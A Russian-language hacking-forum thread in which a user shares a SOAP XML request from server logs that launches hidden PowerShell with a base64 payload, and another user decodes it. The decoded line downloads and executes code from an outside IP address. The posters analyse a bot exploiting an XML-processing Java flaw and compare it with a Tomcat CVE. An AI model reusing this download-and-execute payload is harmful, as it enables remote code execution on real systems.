ANTICHAT - наблюдал интересную атаку...

ANTICHAT (https://forum.antichat.xyz/index.php)

- Этичный хакинг или пентестинг (https://forum.antichat.xyz/forumdisplay.php?f=209)

- - наблюдал интересную атаку... (https://forum.antichat.xyz/showthread.php?t=563548)

Код:

soapenv:Envelope xmlns:soapenv = "http://schemas.xmlsoap.org/soap/envelope/">

\n

\n

\n

\n

\n  

\n    

\n      cmd.exe

\n    

\n    

\n      /c

\n    

\n    

\n      Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==

\n    

\n  

\n    

\n

\n

\n

\n

\n

\n

\n

вот что попало в логи, одного из серверов, атака шла от китайского IP адреса ) понятно что задействован powershell и js или java

возможно я спалил методику атаки... давайте разберемся!

кто что скажет?

Декод строки
$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL+ $OS";IEX $WC.DownloadString('http://111.230.229.226/images/test/DL.php');

Скорее всего бот гуляет по интернету и пытается проэксплуатировать дырку в каком-то java-приложении, которое обрабатывает xml.
Подобный эксплоит есть для Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass. CVE_2017_12617
Но тут какая-то другая уязвимость